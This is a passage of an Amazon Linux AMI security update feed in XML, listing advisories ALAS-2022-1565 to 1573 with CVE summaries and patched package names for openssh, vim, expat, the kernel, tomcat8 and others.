arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-18.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1565</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1565: medium priority package update for openssh</title><issued date="2022-02-10 22:00:00" /><updated date="2022-02-18 22:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41617:
A flaw was found in OpenSSH. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user. Depending on system configuration, inherited groups may allow AuthorizedKeysCommand/AuthorizedPrincipalsCommand helper programs to gain unintended privileges, potentially leading to local privilege escalation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41617" title="" id="CVE-2021-41617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.77.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.77.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1566</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1566: critical priority package update for perl-Image-ExifTool</title><issued date="2022-02-17 18:30:00" /><updated date="2022-02-18 22:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23935:
lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23935" title="" id="CVE-2022-23935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Image-ExifTool" version="12.38" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Image-ExifTool-12.38-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1567</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1567: medium priority package update for vim</title><issued date="2022-02-17 18:34:00" /><updated date="2024-02-14 20:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0359:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access with large tabstop in Ex mode, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0351:
A flaw was found in vim. The vulnerability occurs due to too many recursions, which can lead to a segmentation fault. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0318:
A flaw was found in vim. The vulnerability occurs due to reading beyond the end of a line in the utf_head_off function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0261:
A heap based out-of-bounds write flaw was found in vim's ops.c. This flaw allows an attacker to trick a user to open a crafted file triggering an out-of-bounds write. This vulnerability is capable of crashing software, modify memory, and possible code execution.
CVE-2022-0213:
A flaw was found in vim. The vulnerability occurs due to not checking the length for the NameBuff function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0158:
It was found that vim was vulnerable to a 1 byte heap based out of bounds read flaw in the `compile_get_env()` function. A file could use that flaw to disclose 1 byte of vim's internal memory.
CVE-2022-0156:
It was found that vim was vulnerable to use-after-free flaw in the way it was treating allocated lines in user functions. A specially crafted file could crash the vim process or possibly lead to other undefined behaviors.
CVE-2021-3875:
There's an out-of-bounds read flaw in Vim's ex_docmd.c. An attacker who is capable of tricking a user into opening a specially crafted file could trigger an out-of-bounds read on a memmove operation, potentially causing an impact to application availability.
CVE-2021-3872:
An out-of-bounds write flaw was found in vim's drawscreen.c win_redr_status() function. This flaw allows an attacker to trick a user to open a crafted file with specific arguments in vim, triggering an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, and system availability.
CVE-2021-3778:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3778" title="" id="CVE-2021-3778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3872" title="" id="CVE-2021-3872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3875" title="" id="CVE-2021-3875" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0156" title="" id="CVE-2022-0156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0158" title="" id="CVE-2022-0158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0213" title="" id="CVE-2022-0213" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0261" title="" id="CVE-2022-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0318" title="" id="CVE-2022-0318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0351" title="" id="CVE-2022-0351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0359" title="" id="CVE-2022-0359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-common" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4314-1.1.amzn1.noarch.rpm</filename></package><package name="vim-data" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4314-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4314-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1568</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1568: medium priority package update for containerd</title><issued date="2022-03-01 18:04:00" /><updated date="2022-03-04 21:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23648:
A bug was found in containerd where containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd's CRI implementation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23648" title="" id="CVE-2022-23648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-8.12.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-8.12.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-8.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1569</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1569: medium priority package update for expat</title><issued date="2022-03-01 18:04:00" /><updated date="2022-03-04 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23852:
expat (libexpat) is susceptible to a software flaw that causes process interruption. When processing a large number of prefixed XML attributes on a single tag can libexpat can terminate unexpectedly due to integer overflow. The highest threat from this vulnerability is to availability, confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23852" title="" id="CVE-2022-23852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.25.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.25.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1570</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1570: important priority package update for expat</title><issued date="2022-03-07 23:17:00" /><updated date="2022-03-08 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25315:
An integer overflow was found in expat. The issue occurs in storeRawNames() by abusing the m_buffer expansion logic to allow allocations very close to INT_MAX and out-of-bounds heap writes. This flaw can cause a denial of service or potentially arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25315" title="" id="CVE-2022-25315" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.26.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.26.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1571</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1571: important priority package update for kernel</title><issued date="2022-03-07 23:19:00" /><updated date="2022-05-23 21:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24448:
A flaw was found in the Linux kernel. When an application tries to open a directory (using the O_DIRECTORY flag) in a mounted NFS filesystem, a lookup operation is performed. If the NFS server returns a file as a result of the lookup, the NFS filesystem returns an uninitialized file descriptor instead of the expected ENOTDIR value. This flaw leads to the kernel's data leak into the userspace.
CVE-2022-23960:
The Amazon Linux kernel now enables, by default, a software mitigation for this issue, on all ARM-based EC2 instance types.
CVE-2022-0617:
A NULL pointer dereference was found in the Linux kernel's UDF file system functionality in the way the user triggers the udf_file_write_iter function for a malicious UDF image. This flaw allows a local user to crash the system.
CVE-2022-0435:
A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.
CVE-2022-0330:
A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or escalate their privileges on the system.
CVE-2022-0002:
Non-transparent sharing of branch predictor within a context in some Intel(r) Processors may allow an authorized user to potentially enable information disclosure via local access.
CVE-2022-0001:
Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure.
CVE-2021-4197:
An unprivileged write to the file handler flaw in the Linux kernel's control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system.
CVE-2021-38199:
A flaw was found in the hanging of mounts in the Linux kernel's NFS4 subsystem where remote servers are unreachable for the client during migration of data from one server to another (during trunking detection). This flaw allows a remote NFS4 server (if the client is connected) to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2021-26401:
AMD recommends using a software mitigation for this issue, which the kernel is enabling by default. The Linux kernel will use the generic retpoline software mitigation, instead of the specialized AMD one, on AMD instances (*5a*). This is done by default, and no administrator action is needed.
CVE-2021-26341:
AMD recommends using a software mitigation for this issue, which the kernel is enabling by default. The Linux kernel will use the generic retpoline software mitigation, instead of the specialized AMD one, on AMD instances (*5a*). This is done by default, and no administrator action is needed.
CVE-2020-36322:
A denial of service flaw was found in fuse_do_getattr in fs/fuse/dir.c in the kernel side of the FUSE filesystem in the Linux kernel. A local user could use this flaw to crash the system.
CVE-2018-25020:
A buffer overflow flaw in the Linux kernel BPF subsystem was found in the way users run BPF with long jump over an instruction sequence where inner instructions require substantial expansions into multiple BPF instructions. A local user could use this flaw to crash the system or escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25020" title="" id="CVE-2018-25020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36322" title="" id="CVE-2020-36322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26341" title="" id="CVE-2021-26341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26401" title="" id="CVE-2021-26401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38199" title="" id="CVE-2021-38199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4197" title="" id="CVE-2021-4197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0001" title="" id="CVE-2022-0001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0002" title="" id="CVE-2022-0002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0330" title="" id="CVE-2022-0330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435" title="" id="CVE-2022-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0617" title="" id="CVE-2022-0617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23960" title="" id="CVE-2022-23960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24448" title="" id="CVE-2022-24448" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.268-139.500.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1572</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1572: medium priority package update for tomcat8</title><issued date="2022-03-07 23:20:00" /><updated date="2022-03-08 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23181:
The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23181" title="" id="CVE-2022-23181" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1573</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1573: critical priority package update for expat</title><issued date="2022-03-09 22:48:00" /><updated date="2022-03-10 19:12:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25236:
A flaw was found in expat. Passing one or more namespace separator characters in the "xmlns[:prefix]" attribute values made expat send malformed tag names to the XML processor on top of expat. This issue causes arbitrary code execution depending on how unexpected cases are handled inside the XML processor.
CVE-2022-25235:
A flaw was found in expat. Passing malformed 2- and 3-byte UTF-8 sequences (for example, from start tag names) to the XML processing application on top of expat can lead to arbitrary code execution. This issue is dependent on how invalid UTF-8 is handled inside the XML processor.
